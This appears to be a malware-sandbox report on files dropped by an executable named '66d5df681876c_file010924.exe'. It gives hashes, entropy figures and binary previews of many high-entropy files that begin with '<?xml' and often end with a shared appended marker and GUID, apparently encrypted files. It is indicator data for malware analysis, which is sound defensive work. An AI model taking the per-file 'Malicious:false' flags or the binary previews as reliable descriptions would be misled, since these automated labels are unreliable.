              Preview:<?xmln.@........G;."...I......I....j..(v."[..+2.WIG..f...K(...Q+.:..a..Y.b...w=p.0>QLa.1b..6.JRH.-.....+.....jV........H.....Z#..\...|I.W.?.,v$.X....V..g......4.Nu..P9.B1...(.7.,.......8.:.IO....z(1x,....`.A[g9..-.WH]..'...wu......`..i.....I<$C.....E..).8...2M......3..H.(j.<.$h...[..d.l[..D ..w.../9pv.F......I`II..I.|.....d.g.7$..8..UX.E.m.........;.A@..q.[..L.0..kQ.t..yX....}.....e...f]C.^.6qZ...Tc..Ti........[..IL.._8.(.-h..q...o...8.I..O=p.......ab.R.U.....=$..B.....*..:....j}.f....[..`..@M.....pZ.=a.n..".eN.F........`...<..x...V..I...Y"u.$.I.$r......t..!ff..e....l.P...n.D..nuF...CFe..mE........C.../V4.+.`....Yk..(...QF.a....+.#W.p.......,m.....q..wHV..G.k...$..2......z..4/...Pl...X}...].m.....c....&.[l.......8s..4.I..jq..Z...rUc...+Q#..#%Mv.._.M.1:......A.v..u...F...@Q.W.K..P......f..i...X.c....|`.##.}...*..{B.....a...<..........]/N.lD...2...,.#3.U.t.H..*Z.."..+..t....R.^.........g...oGO..\...\..C....8n`.q....d.;.#.....#..jg.pS?x..S
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1547
              Entropy (8bit):7.874644348758658
              Encrypted:false
              SSDEEP:48:pOdAKPNxd0tOCk79WtRw2glj8rtMaGzgD:8L7aW79WM5WJq8
              MD5:DC8F3E18221D4C58FFC2FA2939F85EBE
              SHA1:1DB585E7AB9BDF02493AE421C0C7ECCC8455F78D
              SHA-256:611895F36C0F1682EB5E63D6720089898E9D48647D65897077F73031086B74F2
              SHA-512:B410F91DF35ACFBC1E4D20420D742272C4E5013C265A9E8E43C56F49BC8E4F9433E423A59ACE721A917D55F2A3C45679411125C560F8457D06D38BB5A1F3305C
              Malicious:false
              Preview:<?xml.....'.R...)3.i.R..p..\.>l...`.......I.Z....Ga..y...w7"'.poi.feZ.'...zb..Fk...........]..o...j. .}..2..^xO.....(...|....|...]in.C.wbW..L.$.9..}E{Ah....... .a.j.$.....F.H..p.'...eS2;.[.C.j...h.z.Li........2...f3D../.G..FH4.N..lgn......2.a.L.b...sMm.qZ't*...W.B..........^l.p.\......yJ....X.l6..]C....J.e...H#H.."*b.P%Ha9.C.X........U. .-V....,)x%.... ea.A.....{...j..s.$...>...R.H..\xS.R+...He...n.yFE..U.9..2..*~.....c.....V......f...3...;.1.n...$.{../..p.'.~.5..@.y%..v.....N.#(..)..?..s$.:@_.q..*..8.#^.y.7...3,Z.~..Dy.....M/O7n.=.Of._..!......).!.b..s...v....y...oqK..p..QV....7).p...%pU...5.....&.m..............ML-}.$^]..q...l.v..v4..{)qd....$..'..*.......:...o...bp...%....~a.f0.)9..n....)NS.....A.LF....?..J..~JR.6.*...ny...`I[r.gL.....x...-...B.^m....r..#I../.....{E..?N...v........W&nI....|n....u...c..D_:|/.......".H.......sJ...Zb.....z..... ...4?c...I.W=..6.L4...e.....3..;6:2....X.WA2DG.<$.......N...\{N.....R...4`.D......h}..J.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):7.712017305828455
              Encrypted:false
              SSDEEP:24:vGYzpvQUabDy2fz2WLtEC/wL8IHwr8FmPbD:uYd4UaHy2fCstEfwrumTD
              MD5:4F5675F4A1B282BC1E8066102ED125F4
              SHA1:1BC2C21CE280AE6BEE9A412F845257CBEA677903
              SHA-256:4D54B79547E4CB64327C0A145E5B073F76A7DAAAEDA68EBA46E27EB4513CAD0E
              SHA-512:E0DA6BF5841AD86047F778FA9637AC72AA9C3928C9570CE3B4A813D5FA3DA851EE9F81C186F089B3BC84C69980FACC8D2F9683F52336C8089286AC9A005EA8CA
              Malicious:false
              Preview:<?xmld.}>o.4..?... ..+..4....[..p...0..b.M....9.. t.....(..E.........ae)..Y......#c....zc|xT3..G.......2..6Or....6.*Kf..[...C..U....S..<,8W...@T:o`/..Z.{.......V.V.S....d...Z.Ea..C....d.....2'3g?..TE.H.M.<[.V..3.SMf/....._K........dS2@.s..w.5..K...q+...G\.(..0..iv.....$..C.[.6itn.@^g..D...Iw.q......N.X^....'t......1{w.......).......|..L...P..~.>-1K.5#c.L...l........%.1...(..8....b..`.1..W.../u..YvB.{.P0.u..]X......BW.Wh...E0"...-:...>...".?>.... .....>.Ap.e.|..L/.7Cx..m..P..\...!.I.p.2..#..I.T..l~I...;..Sl#..Mj.6...e,..VERk.9.....|q,.+.........'..).u.F..O..}=I......~...]3.>...|....`w_z.........w.y..a.".!-..b`#Y-...%...W..Tb.q...A....'DQ.v..S...>.....?...e.,.A....u.=..q....CP....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1823
              Entropy (8bit):7.897392768273039
              Encrypted:false
              SSDEEP:24:AaR5zfeHYUl2VTrxZNGoWQFwENRaPZ4QbFcLRIANStub7iGT4eQNGa8JLBROcfB+:1SD8VTdZcPcCmIANStUiC4vkaWOhD
              MD5:D0FDC3F39643F6FAF9A6A2F3309D8892
              SHA1:29917B7796BC260C4A109147C39A93E25B2907E3
              SHA-256:2F742D1547DEA1A5C9EB0BC3F9FD693AF33AEEC052280C895DBAADEE02F1CAC3
              SHA-512:8D49A0FA37AF98C49391AD7EFA9AFD9DB40E0C77B7BDC217364186035C08143F99CBB78B748CD0329FB7D5BA7CB638F2A6276A221DF4CF995A26C10342633C84
              Malicious:false
              Preview:<?xmlpu_.tHdty..............}...lRk..+Z\.G..g.0fs..n .bD.......... .E.,........0.....37.D......o:7......NQ.0..,..'._0.X..Z..5.'..]V..dn....K...\....n[....Y.;*.}...`.T..n.3.g.v.{....W."z....H.....b8S@...-..<).....4...~.....c..E.!.........|.B=.3..0.F.ZQ.k. k!#..M...Zr.N.UH.e`..gU.AD{..4.V.1.cT...J.[=....r~......1.L......8...+o.Hc.... .b..{,>.b..O.......2c..~.d#^.}u...p.[>\../]..Y.1.B.d...V._{e..u \.pi.g....N:....9.....+....pLC...o...@....4!..]....<.&..p.s..yD.m....(.j...21.&..l.....]6...:.+W6.........zOM:...4.#v./...<....L+4!>.Nuj...=.r..-.....-.....\...a...V.1(.OM..QA.....-....c...o..@....*o}.>...q.4.'..;../.o..(..].P..@...OQ....#T..rL....]J....Nv>....gy..q.8...J.P..>e_G..N..7q..|(.....".\..vk..7.v.....g@.VOZ9 ....P.D....P.....D.".........g......7...<........!9...Y.Mx..U..D......m..<1.k4%8.QO.y.>y:r...C.f.........X.{.%..T.}...)..J1..d..{.oy+.{........Q...{C...........n.(...My...}...i.........z)...1.qeK..+.Q..f..$.....?....}.Rr...2.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1136
              Entropy (8bit):7.810049108033341
              Encrypted:false
              SSDEEP:24:tiTtxJ0cUB2C7bCJUYh7Mx8wMDQDJ4qZ0I5ZImJQ32Hx/f/9bD:tQtxhgX+yYCxhNvQ36tD
              MD5:3E6949D59C1B6F423708C8E77610676F
              SHA1:DE809546DB7840EADBE4401B3EA263614400AA01
              SHA-256:9FDBFAAF11E912CC7940EBC142A2726506BFBC6810005C6176BC306F69B2D6B7
              SHA-512:D4DDEB4837D7D02AA0E8129064B26DB131FFEDA3FE3C810357CBF187F1A371A04BC7853DB7668D697553FBA465960B503D4693CAEB2D43F25A176787948F66F9
              Malicious:false
              Preview:<?xml..GZ4.c@|.C.0M.......|\.'.I:E..%........n..'.D.p.v+.a.<WF`#.,:N..?..`[]ZB%......4.r..[...Q.F#'V...c...........,w..9...y.&...u..|....[.x..4>{.C...... ...!S....Rl>..X...-.T@...zS.7....m!.\j.H..iq:../..[..L.+R...V.....:..7..w......`.X4hS,.!5P..i{...4!.V.....l.;.F:......gO+... ..-.$..n....H..&..N.D...l.B.w...e.[....TV......d.u......O.'./..@.Ip,.;ny....^?#......R...!Pj.......+..9ZyL].&....PR..<s..;`......-.j+P+.99G........T..\t..`.........wR.B.|..\...!Z.K...|.N..3..$'....T.)F....k...w.....4...^.A-B...\5,.].x|..C...^.hL.f.i4...;e.watK...cC.`"..C..y..G.0i......}.ls...XAjKQz.d.y}xOf...+$.%...V.D7.*...e.......F....Q.{...i.5...y|......uI....l..$..)/E.;.N.......1...`?y.".S..=.K....\.DD$._e.g...a..3.<5.A.rG)A.."ut.i.2..{pc[......R6.hc....hDM3.{.....D)).H..W..q..!.X......[Q.....F....e.`..5.J:U...!............T..Q?}.0..E.......~...RH6.i...d%+..o|Hx^..E...1..5;...p.....w.W$...=o..p..e}.s}U..\2z.\....&.....)..p..F...Y.8..<.|...J.....@..8.[(..~=yY....,$.DJ..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.723355049209717
              Encrypted:false
              SSDEEP:24:zUYxnUDDhop+T3uw9pRdduP/j7BxL3nqrMbD:zUYxUXCedduP/j75D
              MD5:7AA9284FAD29AA7265494FDFAB115B1E
              SHA1:ACDCBEAC8E7B1C01F213E9C486D61DD2F6A4997B
              SHA-256:42FC6B878434785FBB3F465B352D004AFD08717292C07FAA9AA4B1BB2540BF04
              SHA-512:63A4F8867DB7C235AEECBBC1ED8EB09DBA89211DE3D2691652EA46377DE046F30F4256DFAF9D84C899C69D5E0C290A6CB84A4E2D2C231C12AA665994F69701C6
              Malicious:false
              Preview:<?xml.rv....L..w..W~.2..u..^.0^......q.4.....S.[p3.n.5...E........kp..Y..8..xt/+-E.....h..$Y....5...%.V...j.....mM.&{V.].>..so.....|@.../....'/c..pD...n......%.O%..A.7...+._v#.w..M..$.e{N.a.nBG+m.....1G.Q.#.KN...q.}.X..#......p...(z...u......9a.6..v...)h...N..9.?.>.\....F..M..._...............*...`I,>'9}9G......M.2 ..\..X#.3A...9....M+%.....$....Q5.?.3;W.I........G...U..r....sS7{..w..s...I...0.......^._N.|^.u...y....Q..L.@....$mU..........`....>E?....c7m...j..c.........v.'.=..-.....4..Wy.E...,...!Y|..-...h?.Kb...)..o.........y........Xv..^....+.kMdP.....$a.#.|..4.D.9...$0v....jx.xJ.bJ..r..V.5....?....e..Nl.|Y..F.+;...6.Sq...=..9t. ="S:G...s.n"..k|.k..h.N.u.!...=...@.l..M..|.6U8z)...y.W...NG(...{....*.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1006
              Entropy (8bit):7.789023657508999
              Encrypted:false
              SSDEEP:24:ILKimnDcY01OJH2sAH+6H5CnGSGxWaqSq+ak7bD:1imnDf0aH2v+6H5k1GxWtv0D
              MD5:31F8414B1B4D116EC8912ED13F20E94B
              SHA1:7A42BCA11E70B44C9EEB60B829CB5C6C82B5AAC3
              SHA-256:F33F4859FA9BF86D790711ED6CBF6E189F36525BA7F7E82BC7D0522F7459DA83
              SHA-512:133354A19CDE0170A0FB247A70311481CCB40A31CA421458AB5D4EBD7D9FE99C631CEDE12BAD04CEF285C5BFD7EDBB14112D8D68000D6F0D0B76034FCD11F184
              Malicious:false
              Preview:<?xml.....R."GB....^&.....b.<..Y....#/S....XF63X.U..:K*G..a.V.......g.!..I.~Yz# .!.....:.C..b$%..,}Wj`,.a.8.....g.{<..Q.g.R...ERi....-gt..6.....,.MY....|^\Y..7...0V...l).EH?=.aF.v.b...C+.....%...N..].R....e..U...L.`....\.r..7...).....Q.B~..}.......(...Wx..#H..!RH..Z'..o.6-.x..`..s.4..........xYu=j.i.U..l.~..HT.OY...*=.L..V..5#....w-..>.gl.. ^....a..8..R..0..H..Oz..6..ma.....B. .V.....G.....L.....V..;.O+.!X..=... ..b.Z....s.W}.S....dJy.,.c...!=B.....G*.}P..?..Z&x.(E.Y7...~.....9=0.7S..!..).N...n.>.......z.U.......N.`g..(}.I..o_.x`.3W->..5.....V..C.....$..U...(.J-..........#$q.R$.0..c<....e...YK...8ER.{.....4.i._.Bu..I....e...KM6Y.; ^....5~..JG..DnM..w9.&..(*.TS.3%!\v..I...,[;.0(6.a....U..~4.T.X+g.".....YhZ..0...6..R..A.?.;.u..k..rB..&..0PW..$.._...........&zn..sA..Y..^n%...hp...?uJwv>...f....(.A*.#.$Poe..$4kmx.S...^4uL..|.=.n...q;...4.cA...N.....hX...].3uL......@5tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1022
              Entropy (8bit):7.785361373699946
              Encrypted:false
              SSDEEP:24:rGjNf7utz6ah6NHIsdE0KtUhstbOFI3AKEoNHeNumbD:yh3VosdE0KtUhsOFCDBNHeM0D
              MD5:2461DAFEE3C3BE81D40335EB400797EB
              SHA1:DBCD8D4E081B27CA58A814D1C57735B616C0EED4
              SHA-256:A39F1C8487C99E00A436A4E47B5A184ABF6A72722FE7029CDE46F94E44D34388
              SHA-512:9236BD15136BE4A853824BF4E119DB15E726508D8CEE87DD9D38E5063B16CDB13682DBD28AB72A431A699C3291DD1D2CDFEC66EA7B5B79EB0B4E472261A70CB0
              Malicious:false
              Preview:<?xml4&.W@..i.g..Z..P.>g.c....V|..rh....u{.X.......lx..td..pyJ.....J.3.\.]..";...y>B-...Et.t:...X...U.Q.a.2.c6..s.f.l3.....f.iA.30...-C....j{.9.5...K..0.>.m..`.M../1.hs.@...j..#z.c..m...-...6..}.91...C....aF.)"~r. y.[..TO......GnY?...-.7...D....p]...EH..ad.......^...v..W .z.1..x|...X..N.:.k...N.g.#S.....V.H.lZ.u R....N..n..HW.$.T....7....7..-c...........o<.7.. '....q..3....../...:...9.n.P.T..P...L..HD5..A...TMU...:.......0....}.A....q.....P.....R......Pcc..U...4..a.b..b..0...o.W.m..U}.........ng.tw..!%.>;.f.Ky.M....0~..6=...5..2.J........s.*..|..29..t!..s.......\..W~...s..U\..De^.....i.j:]....|nY.......)k.WG-...r 9.....(.....[5a..{!M~.At.5w.%y&..GFG.n.~..s.^G.....h..a..F&...i........`..1..d..GW.\.......A.(..........bh.\.^.,Y..S.VTHq.m.jQ..*..8...Y.....f.O....A.......3..x..l..N$.)..('8tG5K. ...H(.R.......r!uP~m-..A...8.=..?<d2...Y\.....a|.r.{.:.<W...F.._E=$.k2...t[7q..p....stp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):831
              Entropy (8bit):7.743180254713174
              Encrypted:false
              SSDEEP:24:g84Hz8AeRUAs5fugL/uk8vYczMVXsitV9anyk+9zpbD:g8Yz8aAsXLGkuyVlPkydD
              MD5:0AAC7971018591DE522D9B5A4B7E38AB
              SHA1:89453154C1E1967BAC6E4F97E7BF1C351F87B1E3
              SHA-256:89E48B1EBC385CEC0BDA1B5CD433F9C30489B8D8F129D36488CADF1AF1F1D1F5
              SHA-512:9E91E49FFC3D03BB9D05E3475017F81BFE8FD478C0D5A1A630955ABBC42FA90077E17C311E04DADEE6A04B2F10594204BD5DBA4F2841D2F1CF51B716BE8FC1DB
              Malicious:false
              Preview:<?xmln.....G)r...O..._..:.3..<..)...fS.kB.. .1#...#..k.E.[.&.e....h\..............$zx...S. #......|.A..I...Hj.z.j|Dw..t.,.)g".#+..Z.J..wN.f...!$s..E...........wuwODO..tU....J..G.c.E?.g.sx.......7.l...M...2..-.R..eZ...*.....b..X.=....%....yq....>.....`9]{j.j_7.,....y$)a6.....}.SL..V..z..=.E;./PK..\.L..n8....'x.v.||(.s...i.k6...<I.{.&....E...\>"s`u.&..8,3.h....H.Y.^%...T.......*n.M.RQp^.8..X..:..v....h.+..U..o..A.0...o-.F.-...._...........l...h](..F.}...Nm....>../..&..*.4.|.U.a.."W...nA...m.c3..n.;._.....5OC...I...)D(9.t..bS.k..p.......m.|...d.....w..Q.|.....q>G.3..z2.-tM..!.kn3.Y>z......_A...)...0x]..<..j.u......0=AUO..../7l`.."...{.e!...@...^T.{\eQ.H..F.+.2.....O.Qexd)X.'.:.&.X*.......E.......j...!if...p.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.750262097441077
              Encrypted:false
              SSDEEP:24:MimIPpI7T9rMrGKTTHwPxpOBwYNQ1jdebD:JI9rmTTHExpwwfUD
              MD5:36B3271DEEB4381059CAD942433DADCE
              SHA1:7403DECAEFCE91CC5A772EBADA0D5E896375B15B
              SHA-256:17258C75FF5271462014E9D2C22617253654FE625B60829A42EA6E3DF4019F06
              SHA-512:ECC07D8485757CCA9530ED90E625671DFCA1C0CE66F68230A278219334F80F56809FA9AC48332AAF428DA697D6977845FEB68DA62C93C924913DD0B3133CCD1A
              Malicious:false
              Preview:<?xml.#.....|.......Kifn..hq...p.Jfh....A....7..G.}*C&.V..1.%.9.s...;.`.'..:;Y...$.Z..B.#].wG..mxG.8...3B.../O............!.<.+M..%_Q.........Z..t...D.%2....f\...(2@G2....v......c..M{. ._qB..c..-.1 ....5.`.....!.uQ...|..}.}.,A.x..}%gpn=..a...}!.e.HGu.......g.....}.....$.....u.........x... ..J..[L..."WNA@..Y.^..J....*.e...w....r..1...m..Vr..CyV!.....!.4G.p[...8_...{%z9...c.. ..)...V..-0.....?b..[.....X.$......'..`..J_...~e.7H...k.#Q..y.,......T.l.t...Bd...G.C.[.4.......~I..?.C..0...h..?...8.<.....^..'...u{@o=...0...)u.(L@..!.Bs..3.....B..)J23....(#.B!!.*/G..u.Z4W.L..IJ.....e.;.......G.q4....g.V..~"....]-.$x.....=.....gh..@-.0|g.4..].eM.F......\........Q..".'...Q....%.n..i..._\.M.........kb\.:.?cQ..1...y..%..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):759
              Entropy (8bit):7.719789159300577
              Encrypted:false
              SSDEEP:12:AiQTfistZ6w4CdX2N6Af4WgxN7LlSjIsbZVCLgdZZTSiU5fIeol9B4TjukIcii9a:AostZUCdXzAf4WgxN7yZKgnZvU5gN7qm
              MD5:B41F1C37276AC042BAD0E9B4D40AB49C
              SHA1:8E70DA9624CAA58DCF0D25D17B7EEC3389CD9D07
              SHA-256:050CF7851F973A78C4446A048E441C2617F9B721763A926CAE4703EEE07D8EB0
              SHA-512:B478315D2EB07089AF2F8328B7B5C060A1814D86B42F18285E2790C37A9B4855E1D08B8F16FCBBA993FD27551761D281DEE87D3FE420C5778F7EE1F65750B24A
              Malicious:false
              Preview:<?xml=.....?.p..?,.2.|2A\.z.D.....@...L..(H.d\...Ql..<.X4.].......rP.u..,U..*.k.W.......-%...[.$.s.6./........-..`.o"q...S.Z....1$I>...#:.qw.......b.....V....p.;.Tq.a.ZZ..k...QX.j.W'...R..{.2..3...".V:..*[Z$.%.P.V.+I.|._..$/..U....I......0M.....,}[...t.#]..Mnt1..a7..w....l$..$B6O._R..-.'.......j...Yq. ..\..q.]...g.D..3iM.])z.eG2Rr.o.e...}.i....I......!H|HU.D6.@.AP4..M.u....4.?.6.D2s."..5{G..!br....![.V......5.LlV^0a...a.."..H$k.......I..}...R...F2.L.3t......L&.wSXB.H..K...mo..Ti..:....>RW..A..i..."...)...p.9...@..tBF.X.>...Tr..#.....).u9(.d.o.u.M\W.o(k...D.XG..|~.)..dL.....8.....y8....!.....>l..q..*....9.......3/..Q8.... .!...vA<..J..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):852
              Entropy (8bit):7.764374711003588
              Encrypted:false
              SSDEEP:24:ssK/37RuwO+kKG2h0ZAXJY6XLxUIvz5PtDCbD:ssK/9ugkK0yJYotdtsD
              MD5:057431F2B5D0A0B032CAD98BF8EFECA0
              SHA1:A96866A1D7742DC173DCDEBAB0F390A3CA2DE9AC
              SHA-256:E6AA7861BEE061BF50F89CC2B7ED9CDAD40F9E8EE0FA8451BF2FDC53DE68EA38
              SHA-512:4EB81AF9719AD9A9375DD4BAA9426AA527E559965EBE54A53CB834E0BD9482BD5BE5DC2DBFE75452C643414335BD8D04317D4AF2A685CB3165E021FF86741AE2
              Malicious:false
              Preview:<?xml4]F:._...!`D.\zg./3.NP..e...{./Z..Z.C*!..1c.....ed`...........?).T.....;ko#Fc.I.6....%.DU(..Y.D....}eh...v/..7u[}>n$...O..No.<I.UyD.W..........vL.^."..K.a..(..*.2NZuF..7f4..\. .~A].yGZF...9....C......}..)...f...1.v...C.cd..`.+..Y..H.EK.%(...}l>d.Hh...06........d..6..[G.J4J..L.G.T5.... ..V....+,.H.Yr..!.SEK.[.~vQ.Wd.\a...zu.O....u.pa<=.....]........*.]*iUw..\.?j...kd.......@......&Ii]...r7^OZ..U|.40#D..>...Nx....Ut.;.#9D...%..s...........+......Zl....#..t..S1<.}...h.).?`.#.......S_...DB..A.o...o.lff..Ye.#S..*.....M..A^#.^.)..0...!.."h.t........,.gg..s..i....4..?......~.u.......I..i<.~.>......a.{).....R....#.XL.i....'.;.../x.k..p..@....+Vv.............K6.7.R...7.}.F.8..?.<...B..\...Ne.,mX..I..s.v.j8..im..&J).-..x...bip...@...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):971
              Entropy (8bit):7.760670410483296
              Encrypted:false
              SSDEEP:12:fMpvqnK+WnQLgYSq+SrPnAVMaTarN4ClD4x6xNbwsxOuSis+YS6ELTdyr/nPukIX:fMpvqK+SySq+sKCl66ffJPDYS6IisbD
              MD5:5F7786ECFBBFC370F147DF59AC52CABA
              SHA1:BCA24C80161C9D67DC303B1190F3EC1171CBDC22
              SHA-256:0FBA05A4DE41E80210F090079AA738A13E1C3FBB2EE5C987EAAD512142B4F66C
              SHA-512:9D8FB225DBB8F61B8E36E105E82EE2B139285283CF542FFA3380AB42C6555C32F4E350A25D71BADEBA0ADF527C39B0DBF8FE6EBD8F5BC32658F30504F789C28D
              Malicious:false
              Preview:<?xml:.T.lr..%8.F$.~2\l....n&...a1.r^._.....@I..d..U......L..7QU.....[...N....~Uw.........* ....`,.j..^%.........~z.....%.T.*......H.v.$....^..M.+........n)@d..)E<0 SB..#P......eK.Vg..]xxV\.Px.E...q.>L;.Jxf.<.H2...R..Ma..*......u.%...%..Y.\.IR.d.|d..0x....5...|Fv....Ge#.X*F.I..^.3%}...5.G......mM......E.)..&~....1.!.n...^....Y....SB...ZcpS...Fq.....).$.2..I&j.U[H..)`^F........m..).%K31._Hr7....4.f..7M.>. ../......>.......h....i..N.?...]....V.Y......j./Q6......K.k?..R.'.M....r.OBc.P&.....).w...k....1..1~V!.P....|...T.G...l....2.!.O.f.O ..B0.|..n#).d<..x^+....J.......!.;........C..#(...:2..i.c.c....F.^Mz.......`).f.......f.....x.R'.)e.....*....../.W...2e..f.....?.d....s.8L.7A....J.D..+.Gz..Z....K9i.z..x.C.."...xgm9..UNg..W..m..tVN.aG..w..Rx.....*....cj.n.c./o.w..........d..8.$.=....v.=...b.*C..f.%.x.Q.L.{.U.6...l.\..9b...P.%nV1..5.2U.;8.Q.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):941
              Entropy (8bit):7.7634587707077305
              Encrypted:false
              SSDEEP:12:bHBqfktvuEanY79oi4a/pGPBRCGM8pjhQZP9YTnLr7ZtDbBtYC+ulmH7nZ5Me/YC:rEMtYA0PPthMP9YHzbBinZVEUZbD
              MD5:8DA7FC2EF6BF48B9B77201EAC9796543
              SHA1:41EC985971562280B6A0006AA344667F3A045304
              SHA-256:163F765DF73EC4DE767DDD2BA07B287705A0D105F626B54A37DFE6625C593687
              SHA-512:A27D2990162FE3515B6A6EA6BD615BAC85027E2D96BA5A12A67571A812078431D5F94D850B4E6ADB4269B11DE9E0FC0E7328A51EE99273F47461C4DA2853A006
              Malicious:false
              Preview:<?xml...).<.y..........H......N....>nq...f..pX.T..$m......ls...9x.r..v.......X.MM....2..@.V.g...,........R....6J+=......c$...7.}...?*.H....,...V.....e...?..W.).K.....O..t.#.y=yFS,Q............5.J.7K:n.b..#......XOU.Uw[4.0..(u8...E=}.>..3K.CX.cj..#.X.........1.........o+<%..r..4%~.x.c.&....B`.!.X..7.}.U..0..^..U...Dy..LG....4..u.n.'9...(Op...F!r.......G_..f..<.u.>;.-.)M..&.l.....j.H4.La..V'X.S..i%.N..}'....m..K\#n.....n.>..p.L.;v.G^..p.N..7l@.of......mc..aK..,.S...fjH.."...ui...XO....ll!eE..P6t...Y.:l.K.<..to.....`...z....yo.....x..).s......".}U.k.4..z5;....+{........U....I.........s...HGK.D....1....`..A...vm..Sm4dI...L.Z..x.?.....H.....5[:Yg..NX..:`.vF.q>....:bL....? x....`.(.W._.;...Q.|.Tm;H|<\.....g..v..4.1C.......?g.z..E...u[...+.B.i..:.d..;)..i..E...|~..4z!..5g...T..a..N..]......g+..z..QA.O..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):945
              Entropy (8bit):7.790978598831156
              Encrypted:false
              SSDEEP:24:fVf6gOcXCa05gKhu1n94EFuYLND1uvcU5bD:fVSgOodMu1uEAYLut5D
              MD5:458D2A7A43D8A9D3714501A9208D0ECC
              SHA1:69EB68DE69125C2AB7DD167E35F7E2B99FC73B7E
              SHA-256:6D1BAE47276BC46EECE3108D17947C9669120516F949E9BD9E38812FEB9F8923
              SHA-512:63602CEC1F7BD6B2B5E19F7C9F470F4B7F369DEDEA964A1BFB7E6FA22C2FD083F5226C5FB86065CF76F7DBF2271E5DC40D9A70D4EF5D4D3541F11373E25FF23C
              Malicious:false
              Preview:<?xml?.C&.]....).....r...q.|...M..T..[.R...G..dc%U..w...vS..f.^...L....=(..~.A....[.&.....uQ..q...n........T.;..l...6y..f...f...Bo>......3z.8..q.@.:..F.)8...?Bo....%........E U.....Nt.`z..+...7L9W)!7Y?->9Z.....c..1R....... ..l..3/...0 .fh..g]....#...%.7..{o.T.....Gb.D......U...y'....W\....V..>N...]....?uQ..`..q.@.....sG.....V.3.T...j..h8k&...|i..m.U9.......6.or...I....:...lQ./.)T.r....k...t(.njJ.....DHm..H?..33n....*M:....0..%.:...W@....$......w.Ko...W$..*.....[......$...,..0.Z.5...N.>.] .YLTiO....q.....P.............W..R....G..$.I+...k.........Xm.U]b.....;".oK....gH..(..................y.?..Vy..!..[._......K..B.[M..0z2.Pj..%./J ......9.VE.o2g.........aB..=....6x.8g..).a.6....<.M...F$......hg.P..Xp...N....".7P.hT.fl.`...=.-..uG..-...sF.........|K.&J.....YD..< .CL+3.>..'".A......j..J..<9.....y.FZ...As<..m.3`tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1639
              Entropy (8bit):7.881747418285744
              Encrypted:false
              SSDEEP:48:F+/7rpcEbs/wl/fYEJrN5T6dmMBKA4rkT75apD:8/7rc/Q3rd6UCK7eaB
              MD5:939EFDB2D5FA9265DCB22FE77D58786F
              SHA1:45FEB7166BAC927EE9DBA40CD1D8B2F277611323
              SHA-256:001DBBB6395BC9444B84E5AB6B4F6930226FA22E6A8FCA252EDD4D7A4C6F6E47
              SHA-512:6924E4A3C04B9FD068E3EC6BD9C5560E507B7432E089546B1AF0EB8565489A758F6085FD6F4A36BE0C99F009FF93529A5C1109C6D451BDB917B535EF650A33E8
              Malicious:false
